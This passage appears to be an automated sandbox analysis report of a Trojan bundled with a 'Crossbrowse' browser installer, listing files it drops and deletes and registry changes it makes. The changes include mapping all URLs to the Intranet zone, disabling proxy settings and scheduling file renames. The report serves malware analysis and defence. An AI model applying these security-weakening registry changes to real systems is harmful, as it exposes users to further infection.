%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin (4 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\5185\prefs (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179 (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\crossbrowse.exe (0 bytes)
The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss23.tmp (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (17497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy19.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bseLbpD9T[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CZPOAqqx9[1] (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsmB.tmp:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxE.tmp (5397 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nshD.tmp (0 bytes)
Registry activity
The process nsy19.tmp:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 DE 0D 5C 09 A9 10 5F 8E A3 8D 9C 96 97 5E 39"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9035.exe:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\5185]
"setup.exe" = "Crossbrowse Installer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 5D 15 FC 2D A9 37 2A 51 A8 80 F7 D0 D8 59 02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsq1C.tmp:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 E7 FF 48 5C 86 60 A0 49 7D 12 E3 B4 F4 49 6C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process nsq1C.tmp:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 5B 3C BE 65 12 B7 69 5F DD A9 A5 D5 3D FB 44"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsz2A.tmp:784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D C3 F0 97 D0 0D B6 7B 4F 1C E5 DF 96 CD 4C 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nss23.tmp:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 E8 60 9A B0 49 A2 6D 2C F0 0D E4 49 95 62 B0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\nsProcess.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
